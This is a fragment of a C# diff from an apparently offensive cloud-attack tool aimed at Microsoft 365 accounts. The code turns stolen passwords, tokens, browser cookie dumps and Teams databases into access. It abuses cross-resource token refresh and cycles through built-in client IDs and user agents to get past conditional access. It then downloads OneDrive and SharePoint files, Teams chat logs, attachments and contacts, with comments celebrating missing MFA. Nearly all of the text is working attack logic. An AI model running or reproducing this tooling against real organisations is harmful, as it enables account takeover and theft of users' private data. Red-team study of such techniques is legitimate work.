-                var oneDriveHandler = new OneDriveHandler(msGraphToken.bearerToken, userName, _globalProperties, _databaseHandler);
-                //Did we get them, if so let's exfil!
-                if (msGraphToken.bearerToken != null && companySharePointToken.bearerToken != null && cookie != null)
-                    await OneDriveExfilAsync(companySharePointToken.bearerToken, msGraphToken.bearerToken, teamsToken, personalOneDriveToken.bearerToken, oneDriveHandler, baseUserOutPath);
-
-            }
-
-        }
-
-
-        #region baseExfilFunctions
-        private static async Task OneDriveExfilAsync(BearerTokenResp companySharePointToken, BearerTokenResp msGraphToken, BearerTokenResp teamsToken, BearerTokenResp personalSharePointToken, OneDriveHandler oneDriveGrapHandler, string outpath)
-        {
-            outpath = Path.Combine(outpath, "OneDrive");
-            var username = Helpers.Generic.GetUsername(teamsToken.access_token);
-            var sharePointHandler = new SharePointHandler(companySharePointToken, username, _globalProperties, _databaseHandler);
-            var personalSharePointHandler = new SharePointHandler(personalSharePointToken, username, _globalProperties, _databaseHandler);
-
-            var teamsHandler = new TeamsHandler(teamsToken, _globalProperties);
-
-
-            _databaseHandler.WriteLog(new Log("EXFIL", $"Exfiltrating shared files from OneDrive", "") { }, true);
-            await oneDriveGrapHandler.GetShared(outpath);
-
-
-            _databaseHandler.WriteLog(new Log("EXFIL", $"Exfiltrating the entire personal OneDrive", "") { }, true);
-            await oneDriveGrapHandler.DumpPersonalOneDrive(outpath);
-
-
-            TeamsFileResp recentFiles = await teamsHandler.GetRecentFiles("EXFIL");
-
-            if (recentFiles != null)
-            {
-                _databaseHandler.WriteLog(new Log("EXFIL", $"Exfiltrating {recentFiles.value.Length} recent files accessible by user", "") { }, true);
-
-                await sharePointHandler.DownloadRecentFiles(recentFiles, outpath, "EXFIL");
-
-                await oneDriveGrapHandler.DownloadRecentFiles(recentFiles, outpath, "EXFIL");
-
-                await personalSharePointHandler.DownloadRecentFiles(recentFiles, outpath, "EXFIL");
-            }
-
-        }
-        private static async Task TeamsExfilAsync(BearerTokenResp teamsToken, BearerTokenResp oneDriveToken, BearerTokenResp sharePointToken, string outpath)
-        {
-
-            outpath = Path.Combine(outpath, "Teams");
-            var userId = Helpers.Generic.GetUserId(teamsToken.access_token);
-            var username = Helpers.Generic.GetUsername(teamsToken.access_token);
-            var displayName = Helpers.Generic.GetDisplayName(teamsToken.access_token);
-
-            var teamsHandler = new TeamsHandler(teamsToken, _globalProperties);
-
-            _databaseHandler.WriteLog(new Log("EXFIL", $"Exfiltrating recently used contacts", "") { }, true);
-            var contactListLogsOutPath = Path.Combine(outpath, "Contactlist");
-            Directory.CreateDirectory(contactListLogsOutPath);
-
-            var contactsInfo = await teamsHandler.GetWorkingWithList(userId);
-            File.WriteAllText(Path.Combine(contactListLogsOutPath, "Contacts.json"), JsonConvert.SerializeObject(contactsInfo, Formatting.Indented));
-
-
-            //We need a skype token to get other stuff
-            (SkypeTokenResp skypeTokenResp, SkypeErrorRespons skypeErrorRespons) getSkypeToken = await teamsHandler.SetSkypeToken();
-            if (getSkypeToken.skypeErrorRespons != null)
-                _databaseHandler.WriteLog(new Log("ENUM", $"Error getting Skype token: {getSkypeToken.skypeErrorRespons.message}", ""));
-
-
-
-
-            var attachmentsLogsOutPath = Path.Combine(outpath, "Attachments");
-            Directory.CreateDirectory(attachmentsLogsOutPath);
-
-            UserConversationsResp chatConversations = await teamsHandler.GetConversations();
-
-            //Check if we have any conversations to look at
-            if (chatConversations != null)
-            {
-                _databaseHandler.WriteLog(new Log("EXFIL", $"Exfiltrating Teams chat logs and attachments ", "") { }, true);
-
-                List<Conversations> conversationList = new List<Conversations>() { };
-
-                //Setup the progressBar
-                int conversationCount = 0;
-                int totalConversationCount = chatConversations.conversations.Count();
-                using (var progress = new ProgressBar())
-                {
-                    await chatConversations.conversations.ParallelForEachAsync(
-                    async conversation =>
-                    {
-                        //Get the chat logs for the conversation
-                        ChatLogResp chatsLogs = await teamsHandler.GetChatLogs(conversation);
-                        //If no empty
-                        if (chatsLogs.messages != null)
-                        {
-                            //Parse it into a cleaner format
-                            Conversations parsedConversation = new Conversations(chatsLogs, conversation);
-                            conversationList.Add(parsedConversation);
-
-                            //for each chat message in the current conversation, where there is attachements
-                            foreach (ChatMessages chatMsg in parsedConversation.chatMessagesArray.Where(x => x.Properties?.files != null))
-                            {
-                                //each attachment file data
-                                foreach (FileData fileObject in chatMsg.FileObject)
-                                {
-                                    try
-                                    {
-                                        /*
+			try
+			{
+				bool forceCDAEnum = false;
+
+				//Pull all valid tokens that has been issued on behalf of this user
+				//VALID meaning the refresh token or access_token has not expired
+				List<PulledTokens> cachedTokenList = _databaseHandler.TokensAvailable(accObject).OrderByDescending(x => x.DateTime).ToList();
+
+				//We have valid tokens, let's work with them!
+				if (cachedTokenList.Count() > 0)
+				{
+					//Future token to be used
+					(BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) bearerToken = (null, null);
+
+					//Preferably, we would like an access token for teams
+					IEnumerable<PulledTokens> teamsToken = cachedTokenList.Where(x => new Uri(x.ResourceUri).Host.Equals("api.spaces.skype.com"));
+
+
+					//If we have an access token for teams, check if the access_token is still valid, and if not, refresh it
+					if (teamsToken.Count() > 0)
+					{
+						var mostPermissionsTeamsToken = teamsToken.OrderByDescending(x => ((BearerTokenResp)x).scope.Length).FirstOrDefault();
+
+						//If the access token has expired
+						if (!Helpers.Generic.IsAccessTokenValid(teamsToken.FirstOrDefault().ResponseData, mostPermissionsTeamsToken.DateTime))
+						{
+							//Refresh the token to make sure we have access still
+							//If this failed the token will be automagicly removed as it's useless
+							bearerToken = await _msolHandler.RefreshAttempt(
+								 (BearerTokenResp)mostPermissionsTeamsToken,
+								 _globalProperties.GetBaseUrl(),
+								 mostPermissionsTeamsToken.ResourceUri,
+								 mostPermissionsTeamsToken.ResourceClientId,
+								 false,
+								 true
+								 );
+
+						}
+						else
+						{
+							//If the access token has not expired, use it
+							bearerToken.bearerToken = (BearerTokenResp)mostPermissionsTeamsToken;
+						}
+					}
+
+
+					if (bearerToken.bearerToken == null)
+					{
+
+						//We don't have Teams, or teams token has expired, get all tokens were access token is valid
+						IEnumerable<PulledTokens> validAccessTokenTokens = cachedTokenList.Where(x => Helpers.Generic.IsAccessTokenValid(x.ResponseData, x.DateTime));
+
+
+						//If we do have valid access_tokens 
+						if (validAccessTokenTokens.Count() > 0)
+						{
+							//get the token with the most permissions
+							//TODO: Make an actual check for the access we need to better identify a access token that makes sense for us
+							var mostPermissionsAccessToken = validAccessTokenTokens.OrderByDescending(x => ((BearerTokenResp)x).scope.Length).FirstOrDefault();
+
+							//Pick the first one
+							bearerToken = ((BearerTokenResp)mostPermissionsAccessToken, null);
+						}
+						else
+						{
+							//We don't have a token with a valid access token, but maybe we can refresh to get one
+							IOrderedEnumerable<PulledTokens> mostPermissionsRefreshTokens = cachedTokenList.OrderByDescending(x => ((BearerTokenResp)x).scope.Length);
+
+							foreach (PulledTokens mostPermissionsRefreshToken in mostPermissionsRefreshTokens)
+							{
+
+								//Refresh one
+								//If this failed the token will be automagicly removed as it's useless
+
+								//If it works they will be stored in the token database
+								bearerToken = await _msolHandler.RefreshAttempt(
+										 (BearerTokenResp)mostPermissionsRefreshToken,
+										 _globalProperties.GetBaseUrl(),
+										 mostPermissionsRefreshToken.ResourceUri,
+										 mostPermissionsRefreshToken.ResourceClientId,
+										 false,
+										 true
+										 );
+							}
+						}
+					}
+
+
+					//Attempt to exfil
+					await RefreshExfilAccountAsync(
+						_globalProperties.OutPutPath,
+						bearerToken.bearerToken,
+						exfilOptions,
+						_msolHandler);
+
+					return;
+				}
+				//We dont't have any tokens, and we don't have ConditionalAccess, and we have initial response data
+				//This is were a newly compromised user would typically land
+				else if (!accObject.ConditionalAccess && !string.IsNullOrEmpty(accObject.ResponseData))
+				{
+
+					//No MFA? NICE :) 
+					//Verify that the token has not expired
+					if (Helpers.Generic.IsTokenValid(accObject.ResponseData, accObject.DateTime))
+					{
+
+						//Parse string into token JSON object
+						BearerTokenResp bearerToken = JsonConvert.DeserializeObject<BearerTokenResp>(accObject?.ResponseData);
+
+						//Refresh in order to get an fresh copy as well as store in token database for future
+						var crossRefresh = await _msolHandler.RefreshAttempt(
+								 bearerToken,
+								 _globalProperties.GetBaseUrl(),
+								 bearerToken.resource,
+								 accObject.ResourceClientId,
+								 false,
+								 true
+								 );
+
+						//If this fails, we can remove the responseData, as it's not valid anymore
+						//Check if it failed
+						if (crossRefresh.bearerTokenError != null)
+						{
+							//Check if the token has been revoked / invalid grant
+							if (crossRefresh.bearerTokenError.error.Equals("invalid_grant"))
+							{
+								//If revoked, we have no need for it, remove it
+								//TODO: Instead of removing, maybe mark as revoked? We might wanna keep for later
+								accObject.ResponseData = "";
+								if (_databaseHandler.UpdateAccount(accObject))
+									_databaseHandler.WriteLog(new Log("EXFIL", $"Updated user account token for resource {accObject.Username}", "") { }, true);
+							}
+						}
+						else
+						{
+							//Simple refresh into teams?
+							//Refresh into a new token valid for Teams
+							//If a valid token for Teams is already in the Database, a token will not be requested
+							var teamsRefresh = await _msolHandler.RefreshAttempt(
+								bearerToken,
+								_globalProperties.GetBaseUrl(),
+								"https://api.spaces.skype.com/",
+								"1fec8e78-bce4-4aaf-ab1b-5451cc387264",
+								true,
+								true
+								);
+
+							//If so, procceed
+							if (teamsRefresh.bearerToken?.access_token != null)
+							{
+								_databaseHandler.WriteLog(new Log("EXFIL", $"Cross-resource-refresh allowed, we can exfil all that things!", "") { }, true);
+								await RefreshExfilAccountAsync(_globalProperties.OutPutPath, teamsRefresh.bearerToken, exfilOptions, _msolHandler);
+								return;
+							}
+							else
+							{
+								//We failed to refresh into Teams,  //We need to enum the conditional access policy
+								forceCDAEnum = true;
+
+							}
+
+
+						}
+
+					}
+
+				}
+
+				//If we get to this point we need to enum CDA
+				if (accObject.ConditionalAccess || forceCDAEnum)
+				{
+					//TODO:Do we need to check if this has been ran before?
+
+					//Conditonal Access, let's enum
+					_databaseHandler.WriteLog(new Log("EXFIL", $"Attemping to enumerate potential conditional access policy ", "") { }, true);
+
+					//Enumerate a list of ressources that was can access based on conditional access policy
+					List<EnumeratedConditionalAccess> enumeratedConditionalAccessList = await EnumerateConditionalAccess(accObject.Username, accObject.Password, _msolHandler, true);
+
+					//If we got any ressources we can access
+					if (enumeratedConditionalAccessList.Count() == 0)
+					{
+						_databaseHandler.WriteLog(new Log("EXFIL", $"Not able to bypass the conditional access policy :(", "") { }, true);
+					}
+					else
+					{
+						//Check if we got a Teams access token from that enum
+						List<PulledTokens> updatedPulledTokens = _databaseHandler.TokensAvailable(accObject);
+
+						//Let's make all the tokens pretty
+						List<BearerTokenResp> updatedBearertokens = updatedPulledTokens.Select(x => (BearerTokenResp)x).ToList();
+
+						//We have NO tokens, let's just end it
+						if (updatedBearertokens.Count() == 0)
+						{
+							_databaseHandler.WriteLog(new Log("EXFIL", $"Unable to bypass Conditional Access policy :/", "") { }, true);
+							return;
+
+						}
+
+						//Do we have a Teams token?
+						List<BearerTokenResp> teamsToken = updatedBearertokens.Where(x => new Uri(x.resource).Host.Equals("api.spaces.skype.com")).ToList();
+
+						//If we do NOT have a teams token
+						if (teamsToken.Count() == 0)
+						{
+							//Check if any of the access token we got, can refresh into Teams
+							foreach (var enumeratedConditionalAccess in enumeratedConditionalAccessList)
+							{
+								//Turn that into a bearerToken
+								BearerTokenResp bearerToken = JsonConvert.DeserializeObject<BearerTokenResp>(enumeratedConditionalAccess?.ResponseData);
+
+								//Refresh into a new token valid for Teams
+								//If a valid token for Teams is already in the Database, a token will not be requested
+								var crossRefresh = await _msolHandler.RefreshAttempt(
+									bearerToken,
+									_globalProperties.GetBaseUrl(),
+									"https://api.spaces.skype.com/",
+									enumeratedConditionalAccess.ResourceClientId,
+									true,
+									true,
+									enumeratedConditionalAccess.UserAgent
+									);
+
+
+								//If we did refresh into 
+								if (crossRefresh.bearerToken?.access_token != null)
+								{
+									_databaseHandler.WriteLog(new Log("EXFIL", $"Cross-resource-refresh allowed, we can exfil all that things!", "") { }, true);
+									try
+									{
+										await RefreshExfilAccountAsync(_globalProperties.OutPutPath, crossRefresh.bearerToken, exfilOptions, _msolHandler);
+										return;
+									}
+									catch (Exception ex)
+									{
+										break;
+									}
+								}
+							}
+							;
+
+							//If we get to this point we just need to attempt an exfil with whatever we got
+							await RefreshExfilAccountAsync(_globalProperties.OutPutPath, updatedBearertokens.FirstOrDefault(), exfilOptions, _msolHandler);
+						}
+						else
+						{
+							//We have a teams token and can proceed with a refresh!
+							await RefreshExfilAccountAsync(_globalProperties.OutPutPath, teamsToken.FirstOrDefault(), exfilOptions, _msolHandler);
+						}
+					}
+
+
+
+				}
+
+			}
+			catch (Exception ex)
+			{
+				_databaseHandler.WriteLog(new Log("EXFIL", $" SOFT ERROR EXFIL {accObject.Username} => {ex.Message}", "") { }, true);
+			}
+
+		}
+
+		public static async Task ExfiltrateAsync(string[] args, string targetUser = "", DatabaseHandler databaseHandler = null)
+		{
+
+			if (databaseHandler == null)
+				_databaseHandler = new DatabaseHandler(args);
+			else
+				_databaseHandler = databaseHandler;
+
+			_globalProperties = new GlobalArgumentsHandler(args, _databaseHandler, true);
+
+			_msolHandler = new MSOLHandler(_globalProperties, "EXFIL", _databaseHandler);
+
+			var exfilOptions = new ExifilOptions(args);
+
+			if (!Helpers.Generic.AreYouAnAdult())
+				return;
+
+			if (args.Contains("--username") && args.Contains("--password"))
+			{
+
+				var username = args.GetValue("--username");
+				var password = args.GetValue("--password");
+
+
+				await PrepareExfilCreds(username, password, exfilOptions);
+
+			}
+			else if (args.Contains("--roadtools"))
+			{
+				string roadAuthFile = args.GetValue("--roadtools");
+
+				if (File.Exists(roadAuthFile))
+				{
+					string rawAuthFile = File.ReadAllText(roadAuthFile);
+					try
+					{
+
+
+						RoadToolsAuth roadToolsAuth = JsonConvert.DeserializeObject<RoadToolsAuth>(rawAuthFile);
+						JwtSecurityTokenHandler jwsSecHandler = new JwtSecurityTokenHandler();
+
+						JwtSecurityToken jwtSecToken = jwsSecHandler.ReadJwtToken(roadToolsAuth.accessToken);
+						string userName = Helpers.Generic.GetUsername(jwtSecToken.RawData);
+						Console.WriteLine($"[+] Exfiltrating data from user {userName}");
+						await RefreshExfilAccountAsync(
+						  _globalProperties.OutPutPath,
+						  (BearerTokenResp)roadToolsAuth,
+						  exfilOptions,
+						  _msolHandler,
+						  clientId: roadToolsAuth._clientId);
+					}
+					catch (JsonException jsonex)
+					{
+
+						Console.WriteLine($"[!] Failed to parse RoadTools auth JSON file, is the format correct?");
+						Console.WriteLine($"{jsonex.Message}");
+					}
+					catch (Exception ex)
+					{
+
+						Console.WriteLine($"[!] Failed to exfiltrate using RoadTools auth file");
+						Console.WriteLine($"{ex.Message}");
+					}
+				}
+
+			}
+			else if (args.Contains("--tokens"))
+			{
+				//JwtTokenHandler
+				JwtSecurityTokenHandler jwsSecHandler = new JwtSecurityTokenHandler();
+
+				var tokenDict = new List<(string username, PulledTokens pulledTokens)>() { };
+
+				//parse input
+				var jwtToken = args.GetValue("--tokens");
+
+
+				//Is the input a file?
+				if (File.Exists(jwtToken))
+				{
+					var tokensArray = File.ReadAllLines(jwtToken);
+					foreach (var possibleToken in tokensArray)
+					{
+						try
+						{
+
+							JwtSecurityToken jwtSecToken = jwsSecHandler.ReadJwtToken(possibleToken);
+							PulledTokens parsedTokenObject = Helpers.Generic.ParseSingleAccessToken(jwtSecToken);
+							tokenDict.Add((Helpers.Generic.GetUsername(jwtSecToken.RawData), parsedTokenObject));
+							_databaseHandler.WriteToken(parsedTokenObject);
+						}
+						catch (Exception ex)
+						{
+
+							Console.WriteLine($"[!] Failed to parse possible JWT token on line {tokensArray.GetIndex(possibleToken)}");
+						}
+
+					}
+				}
+				else
+				{
+					//Is the input one or many tokens seperated by ,?
+					var splitCharCount = jwtToken.Count(f => f == ',');
+					if (splitCharCount > 0)
+					{
+						foreach (var possibleJwtToken in jwtToken.Split(","))
+						{
+							//Let's attempt to parse this as a single token
+							try
+							{
+
+								JwtSecurityToken jwtSecToken = jwsSecHandler.ReadJwtToken(possibleJwtToken);
+								PulledTokens parsedTokenObject = Helpers.Generic.ParseSingleAccessToken(jwtSecToken);
+								tokenDict.Add((Helpers.Generic.GetUsername(jwtSecToken.RawData), parsedTokenObject));
+								_databaseHandler.WriteToken(parsedTokenObject);
+							}
+							catch (Exception ex)
+							{
+
+								Console.WriteLine($"[!] Failed to parse a possible JWT token that starts with {possibleJwtToken.Substring(0, 15)}...");
+							}
+						}
+					}
+					else
+					{
+						//Let's attempt to parse this as a single token
+						try
+						{
+
+							JwtSecurityToken jwtSecToken = jwsSecHandler.ReadJwtToken(jwtToken);
+							PulledTokens parsedTokenObject = Helpers.Generic.ParseSingleAccessToken(jwtSecToken);
+							tokenDict.Add((Helpers.Generic.GetUsername(jwtSecToken.RawData), parsedTokenObject));
+							_databaseHandler.WriteToken(parsedTokenObject);
+						}
+						catch (Exception ex)
+						{
+
+							Console.WriteLine($"[!] Failed to parse possible JWT token ");
+						}
+					}
+				}
+
+
+
+				//TODO: Create dummy user to be added into the validUsers database so we can pick up these at an later stage
+				//Tokens are now in Database, let's pick each for each username
+				foreach (var foundToken in tokenDict.Distinct())
+				{
+
+					Console.WriteLine($"[+] Exfiltrating data from user {foundToken.username}");
+					await RefreshExfilAccountAsync(
+					  _globalProperties.OutPutPath,
+					  (BearerTokenResp)foundToken.pulledTokens,
+					  exfilOptions,
+					  _msolHandler);
+				}
+
+
+
+			}
+			else if (args.Contains("--cookie-dump"))
+			{
+				Console.WriteLine("[+] Reading cookie dump file");
+				var inputFile = args.GetValue("--cookie-dump");
+
+				if (File.Exists(inputFile))
+				{
+					List<CookieObject> cookieDumpObjects = new List<CookieObject>();
+					try
+					{
+						var cookieData = File.ReadAllText(inputFile);
+
+						//Really dumb check / "validation"
+						if (cookieData.ToLower().Contains("\"host raw\":"))
+						{
+
+							//This a dump from FireFox Cookie Quick Manager
+							List<CookieQuickManagerObject> cookieDumpFireFoxObjects = JsonConvert.DeserializeObject<List<CookieQuickManagerObject>>(cookieData);
+							cookieDumpObjects = cookieDumpFireFoxObjects.Select(x => (CookieObject)x).ToList();
+						}
+						else
+						{
+							//This is a dump from SharpChrome
+							List<SharpChromeCookieObject> cookieDumpFireFoxObjects = JsonConvert.DeserializeObject<List<SharpChromeCookieObject>>(cookieData);
+							cookieDumpObjects = cookieDumpFireFoxObjects.Select(x => (CookieObject)x).ToList();
+
+						}
+
+
+						if (cookieDumpObjects.Count() > 0)
+							await CookieExfilAccountAsync(_globalProperties.OutPutPath, cookieDumpObjects, exfilOptions, _msolHandler);
+						else
+							Console.WriteLine("[!] No cookies found in JSON data");
+					}
+					catch (JsonException ex)
+					{
+						Console.WriteLine("[!] Failed to deserialize cookie dump file, does the format match SharpChrome's or 'Cookie Quick Manager' output?");
+						Environment.Exit(0);
+					}
+
+
+				}
+				else
+				{
+					Console.WriteLine("[!] Invalid path given, could not find cookie dump!");
+				}
+
+
+			}
+			else if (args.Contains("--teams-db"))
+			{
+				Console.WriteLine("[+] Reading exfiltrated Teams database");
+
+				string filePath = args.GetValue("--teams-db");
+
+				if (File.Exists(filePath) && Helpers.Generic.IsDatabaseFile(filePath))
+				{
+					string token = Helpers.Generic.ExtractTokensFromTeams(filePath);
+					if (!string.IsNullOrEmpty(token))
+					{
+						JwtSecurityTokenHandler jwsSecHandler = new JwtSecurityTokenHandler();
+
+						JwtSecurityToken jwtSecToken = jwsSecHandler.ReadJwtToken(token);
+						PulledTokens parsedTokenObject = Helpers.Generic.ParseSingleAccessToken(jwtSecToken);
+
+						_databaseHandler.WriteToken(parsedTokenObject);
+
+						Console.WriteLine($"[+] Exfiltrating data from user {Helpers.Generic.GetUsername(token)}");
+						await RefreshExfilAccountAsync(
+						  _globalProperties.OutPutPath,
+						  (BearerTokenResp)parsedTokenObject,
+						  exfilOptions,
+						  _msolHandler);
+					}
+					else
+					{
+						Console.WriteLine("[!] Could not extract useful token from specified Teams database!");
+					}
+				}
+				else
+				{
+					Console.WriteLine("[!] Invalid path given, could not find specified Teams database, or the specified file is not a DB file!");
+				}
+			}
+			else if (!string.IsNullOrEmpty(targetUser))
+			{
+				var accObject = _databaseHandler.QueryValidLogins().Where(x => x.AADSSO == false && x.Username.ToLower().Equals(targetUser.ToLower())).FirstOrDefault();
+				await PrepareExfil(accObject, exfilOptions, true);
+			}
+			else
+			{
+				//Query a list of valid logins for users
+				var validLogins = _databaseHandler.QueryValidLogins().Where(x => x.AADSSO == false).ToList();
+
+				//If we have any valid logins
+				if (validLogins.Count() > 0)
+				{
+
+					int options = 0;
+					Console.WriteLine("\n[+] You can select multiple users using syntax 1,2,3 or 1-3");
+					foreach (var loginObject in validLogins)
+					{
+						Console.WriteLine($"    |-> {options++} - {loginObject.Username}");
+
+					}
+					Console.WriteLine($"    |-> ALL - Everyone!");
+					Console.WriteLine();
+					Console.Write("[?] What user to target ? #> ");
+					var selection = Console.ReadLine();
+
+					if (selection.ToLower().StartsWith("ALL".ToLower()))
+					{
+						foreach (SprayAttempt accObject in validLogins)
+						{
+							await PrepareExfil(accObject, exfilOptions);
+
+						}
+					}
+					else if (selection.Contains("-"))
+					{
+						if (selection.Split("-").Length > 2)
+						{
+							int start = Convert.ToInt32(selection.Split("-")[0]);
+							int end = Convert.ToInt32(selection.Split("-")[1]);
+							foreach (var accObject in validLogins.GetRange(start, end - start))
+							{
+								await PrepareExfil(accObject, exfilOptions);
+
+							}
+						}
+						else
+						{
+							Console.WriteLine("[+] Provided format must be <START INDEX>-<STOP INDEX>");
+						}
+					}
+					else if (selection.Contains(","))
+					{
+						var intArray = selection.Split(",").Select(x => Convert.ToInt32(x));
+
+						foreach (var intSelection in intArray)
+						{
+							await PrepareExfil(validLogins[intSelection], exfilOptions);
+						}
+					}
+					else
+					{
+						var accObject = validLogins[Convert.ToInt32(selection)];
+
+						await PrepareExfil(accObject, exfilOptions);
+					}
+				}
+
+			}
+		}
+		private static async Task<List<EnumeratedConditionalAccess>> EnumFamilyRefreshTokens(BearerTokenResp validToken, MSOLHandler msolHandler)
+		{
+			var validResList = new List<EnumeratedConditionalAccess> { };
+
+			var proxyURL = _globalProperties.GetBaseUrl();
+
+			List<string> officeResourceList = Helpers.Generic.officeResources();
+
+			List<(string userAgent, string platform)> userAgentList = Helpers.Generic.userAgents();
+
+			//For each target resource (Data)
+
+			var clientIdList = new List<(string clientId, string clientName)>{
+					("1fec8e78-bce4-4aaf-ab1b-5451cc387264", "Microsoft Teams"),
+					("04b07795-8ddb-461a-bbee-02f9e1bf7b46", "Microsoft Azure CLI"),
+					("1950a258-227b-4e31-a9cf-717495945fc2", "Microsoft Azure PowerShell"),
+					("00b41c95-dab0-4487-9791-b9d2c32c80f2", "Office 365 Management"),
+					("26a7ee05-5602-4d76-a7ba-eae8b7b67941", "Windows Search"),
+					("27922004-5251-4030-b22d-91ecd9a37ea4", "Outlook Mobile"),
+					("4813382a-8fa7-425e-ab75-3b753aab3abb", "Microsoft Authenticator App"),
+					("ab9b8c07-8f02-4f72-87fa-80105867a763", "OneDrive SyncEngine"),
+					("d3590ed6-52b3-4102-aeff-aad2292ab01c", "Microsoft Office"),
+					("872cd9fa-d31f-45e0-9eab-6e460a02d1f1", "Visual Studio"),
+					("af124e86-4e96-495a-b70a-90f90ab96707", "OneDrive iOS App"),
+					("2d7f3606-b07d-41d1-b9d2-0d0c9296a6e8", "Microsoft Bing Search for Microsoft Edge"),
+					("844cca35-0656-46ce-b636-13f48b0eecbd", "Microsoft Stream Mobile Native"),
+					("87749df4-7ccf-48f8-aa87-704bad0e0e16", "Microsoft Teams - Device Admin Agent"),
+					("cf36b471-5b44-428c-9ce7-313bf84528de", "Microsoft Bing Search"),
+					("0ec893e0-5785-4de6-99da-4ed124e5296c", "Office UWP PWA"),
+					("22098786-6e16-43cc-a27d-191a01a1e3b5", "Microsoft To-Do client"),
+					("d3590ed6-52b3-4102-aeff-aad2292ab01c", "Outlook"),
+					("ab9b8c07-8f02-4f72-87fa-80105867a763", "OneNote")
+				};
+
+
+			//For each built in AAD Client ID (Application)
+			foreach (var clientId in clientIdList)
+			{
+				//If we already have a token for this resource, there is no need to request another one
+				//TODO: UNLESS we want to increase our permission for the resource??
+
+				//Let it be known that we have access!
+				//_databaseHandler.WriteLog(new Log("EXFIL", $" URI: { officeResourceList[i] } APP: {clientId.application} PLATFORM: {userAgent.platform} => CAN ACCESS", "[US]") { }, true);
+
+				(BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) validResponse = (null, null);
+
+				//Turn that into a bearerToken
+				//  validResponse.bearerToken = JsonConvert.DeserializeObject<BearerTokenResp>(conditionalAccessAttempt?.ResponseData);
+
+				//Refresh into that clientID first?
+				var crossRefresh = await msolHandler.RefreshAttempt(
+					validToken,
+					_globalProperties.GetBaseUrl(),
+					validToken.resource,
+					clientId.clientId,
+					false,
+					true,
+					//   userAgent: userAgent,
+					scope: "openid"
+					);
+
+
+				if (crossRefresh.bearerToken != null)
+				{
+					//Do we now have a family refresh token?
+					//Have we identifed a bypass / a token we can use to refresh into another resource?
+					var newScopeRefresh = await msolHandler.RefreshAttempt(
+						crossRefresh.bearerToken,
+						_globalProperties.GetBaseUrl(),
+						 validToken.resource,
+						clientId.clientId,
+						false,
+						true,
+						//  userAgent: userAgent,
+						scope: "https://api.spaces.skype.com/.default"
+						);
+				}
+
+			}
+			return validResList;
+		}
+
+		private static async Task<List<EnumeratedConditionalAccess>> EnumerateConditionalAccess(string username, string password, MSOLHandler msolHandler, bool stopAtValid = false)
+		{
+			var validResList = new List<EnumeratedConditionalAccess> { };
+
+
+			#region userCreds
+
+			#endregion
+			var proxyURL = _globalProperties.GetBaseUrl();
+
+			List<string> officeResourceList = Helpers.Generic.officeResources();
+			List<(string clientId, string application)> clientIdList = Helpers.Generic.clientIds();
+			List<(string userAgent, string platform)> userAgentList = Helpers.Generic.userAgents();
+
+			//For each target resource (Data)
+
+
+
+			for (int i = 0; i < officeResourceList.Count; i++)
+			{
+				//For each built in AAD Client ID (Application)
+				foreach (var clientId in clientIdList)
+				{
+					//For each useragent - Platform
+					foreach (var userAgent in userAgentList)
+					{
+
+						//If we already have a token for this resource, there is no need to request another one
+						//TODO: UNLESS we want to increase our permission for the resource??
+						if (_databaseHandler.QueryToken(username, officeResourceList[i]).Count() > 0)
+						{
+							//Skip unless we are at last resource
+							if (i < officeResourceList.Count() - 1)
+							{
+								i++;
+								break;
+							}
+							else
+							{
+								//If we are at last resc, and already have access, just return list
+								return validResList;
+							}
+
+						}
+
+						//Attempt to login and get an access token
+						var loginResp = await msolHandler.LoginAttemptFireProx(username, password, proxyURL, (officeResourceList[i], clientId.Item1), true, userAgent.userAgent);
+
+						//Check if we have invalid creds, in that case abort!
+						if (loginResp.bearerTokenError != null)
+						{
+							var respCode = loginResp.bearerTokenError.error_description.Split(":")[0].Trim();
+
+							//Set a default response
+							var errorCodeOut = (msg: $"UNKNOWN {respCode}", valid: false, disqualified: false, accessPolicy: false);
+
+							//Try to parse
+							Helpers.Generic.GetErrorCodes().TryGetValue(respCode, out errorCodeOut);
+
+							if (!errorCodeOut.valid)
+							{
+								//Creds has changed, remove the user!
+								Console.WriteLine($"[!] Credentials identfied earlier for {username} are no longer valid, marking as invalid account");
+								var validAccount = _databaseHandler.QueryValidLogin(username);
+								validAccount.Valid = false;
+								_databaseHandler.UpdateAccount(validAccount);
+								return new List<EnumeratedConditionalAccess> { };
+							}
+						}
+
+						//We got an access token
+						if (loginResp.bearerTokenError == null && loginResp.bearerToken != null)
+						{
+							//Note this down
+							var conditionalAccessAttempt = new EnumeratedConditionalAccess()
+							{
+								ResourceClientId = clientId.clientId,
+								ResourceUri = officeResourceList[i],
+								Username = username,
+								UserAgent = userAgent.userAgent,
+								ResponseData = JsonConvert.SerializeObject(loginResp.bearerToken)
+							};
+
+							//Let it be known that we have access!
+							_databaseHandler.WriteLog(new Log("EXFIL", $" URI: {officeResourceList[i]} APP: {clientId.application} PLATFORM: {userAgent.platform} => CAN ACCESS", "[US]") { }, true);
+
+							(BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) validResponse = (null, null);
+
+							//Turn that into a bearerToken
+							validResponse.bearerToken = JsonConvert.DeserializeObject<BearerTokenResp>(conditionalAccessAttempt?.ResponseData);
+
+							validResList.Add(conditionalAccessAttempt);
+							_databaseHandler.WriteEnumeratedConditionalAccess(conditionalAccessAttempt);
+
+							if (stopAtValid)
+								return validResList;
+
+
+
+						}
+						else
+						{
+							var respCode = loginResp.bearerTokenError.error_description.Split(":")[0].Trim();
+							var message = loginResp.bearerTokenError.error_description.Split(":")[1].Trim();
+
+							//Set a default response
+							var errorCodeOut = (msg: $"UNKNOWN {respCode}", valid: false, disqualified: false, accessPolicy: false);
+
+							//Try to parse
+							Helpers.Generic.GetErrorCodes().TryGetValue(respCode, out errorCodeOut);
+
+							_databaseHandler.WriteLog(new Log("EXFIL", $" URI: {officeResourceList[i]} APP: {clientId.application} PLATFORM: {userAgent.platform} => {errorCodeOut.msg}", "[US]") { }, true);
+
+						}
+					}
+
+				}
+			}
+			return validResList;
+		}
+
+		private static async Task PrepareExfilCreds(string username, string password, ExifilOptions exfilOptions)
+		{
+
+			//We need to check if these creds belong to an user we can actually exfiltrate infromation from, aka no adfs!
+			var getUserRealmResult = await Helpers.Generic.CheckUserRealm(username, _globalProperties);
+
+			if (getUserRealmResult.UsGovCloud)
+			{
+				_databaseHandler.WriteLog(new Log("SPRAY", $"US GOV Tenant detected - Updating spraying endpoint from .com => .us"));
+				_globalProperties.UsCloud = true;
+			}
+
+			if (getUserRealmResult.ThirdPartyAuth && !getUserRealmResult.Adfs)
+			{
